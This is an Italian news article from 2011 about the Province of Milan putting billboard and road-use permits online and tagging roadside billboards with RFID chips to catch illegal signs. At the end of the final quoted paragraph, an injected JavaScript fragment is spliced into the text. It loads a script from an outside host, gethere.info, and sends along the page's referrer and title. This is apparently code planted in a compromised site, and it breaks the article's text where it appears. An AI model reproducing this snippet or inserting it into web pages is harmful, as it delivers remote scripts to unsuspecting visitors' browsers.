Provincia di Milano: via libera alle autorizzazioni in un click e alla mappatura digitale della cartellonistica per ridurre i fenomeni di abusivismo.

di Andrea Solinas - 21 ottobre 2011
Classificato in: Eventi, Mondo Insegne, Risoluzioni | Tag: , , ,

Martedì 20 ottobre, a Milano, è stato presentato il progetto di digitalizzazione relativo al rilascio delle autorizzazioni e al monitoraggio della cartellonistica pubblicitaria lungo le strade provinciali, promosso dall’Assessore alle infrastrutture e mobilità della Provincia Giovanni De Nicola.

Martedì 20 ottobre, è stato presentata a Milano, presso Palazzo Isimbardi, la nuova campagna di digitalizzazione promossa dall’Assessore alle infrastrutture e mobilità della Provincia di Milano Giovanni De Nicola.

Semplificazione amministrativa, lotta all’abusivismo, efficienza e razionalizzazione dei procedimenti, tutela della legalità e della sicurezza stradale, ne sono i principi ispiratori.

In cosa consiste il progetto? Attraverso un unico sistema di gestione e di controllo la Provincia di Milano potrà rilasciare le autorizzazioni, monitorare e mappare la cartellonistica pubblicitaria lungo le strade provinciali ed individuare automaticamente i cartelli abusivi, attraverso un sistema che sfrutta la tecnologia “RFID” (Identificatori a radio frequenza).

Secondo l’assessore De Nicola “L’automazione dell’intero processo di rilascio all’utenza delle autorizzazioni non solo risponde alla necessità di modernizzazione dell’Ente, ma consente di sostenere le aziende, gli Enti e i cittadini che potranno, con semplicità e rapidità, richiedere le autorizzazioni ed ottenerne il rilascio comodamente dalle loro case o dai loro uffici”.

L’innovazione interessa, infatti, aziende, Comuni, Enti fornitori di servizi e cittadini perché le autorizzazioni che si potranno richiedere on-line sono molte: dalla cartellonistica pubblicitaria alle concessioni stradali per la realizzazione di accessi privati, dai lavori di tombinatura all’occupazione di suolo lungo le strade provinciali, per un totale di circa 4 mila richieste annue.

Come funziona? L’utente compilerà un semplice format on line, sul portale internet dell’Assessorato alle Infrastrutture e Mobilità della Provincia di Milano: www.provincia.milano.it/trasporti.

Poi l’utente potrà procedere al pagamento delle spese istruttorie mediante diverse opzioni (bonifico, carta di credito, prepagate, pay-pal) e immediatamente dopo saprà se l’istruttoria è stata attivata.  Avrà a sua disposizione un numero di protocollo che gli consentirà di monitorare l’iter della pratica e riceverà comodamente via e-mail la comunicazione inerente l’esito dell’istruttoria.

La digitalizzazione non riguarda solo la gestione on line del procedimento autorizzatorio, ma coinvolge anche la “mappatura” dei cartelli pubblicitari esistenti lungo le provinciali: attraverso la tecnologia “RFID” ogni impianto pubblicitario sarà dotato di un innovativo microchip che, contrariamente alle altre soluzioni presenti sul mercato, è univoco, non può essere riprodotto né contraffatto.

Tutti i cartelli pubblicitari presenti lungo le strade provinciali saranno catalogati e mappati attraverso un sistema di georeferenziazione satellitare. Mediante un palmare di ultima generazione, in dotazione ai cantonieri e al personale della polizia provinciale, sarà possibile leggere il microchip e scoprire in tempo reale se si tratta di un impianto abusivo. In tal caso, automaticamente, dal palmare stesso partirà la notifica della sanzione. Le spese successive di rimozione del cartello abusivo saranno puntualmente recapitate al responsabile dell’abuso.

“Puntare su questa tecnologia – precisa l’ass. De Nicola – significa investire in legalità. Finalmente l’abusivismo della cartellonistica potrà essere sconfitto o, quantomeno, drasticamente ridotto. Essere abusivi non avrà più alcuna convenienza perché gli impianti irregolari saranno facilmente individuati ed immediatamente rimossi. Ciò permetterà un maggiore rispetto del codice della strada e quindi una maggiore sicurezza stradale. Ma consentirà anche di liberare le nostre strade dall’invadenza di taluni cartelli che deturpano un paesaggio fin troppo provato”.s.src='http://gethere.info/kt/?264dpr&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Condividi questa pagina
  • RSS
  • Facebook
  • Twitter
  • Google Bookmarks
  • email
  • PDF
  • Print
  • Digg
  • del.icio.us
  • Add to favorites
  • FriendFeed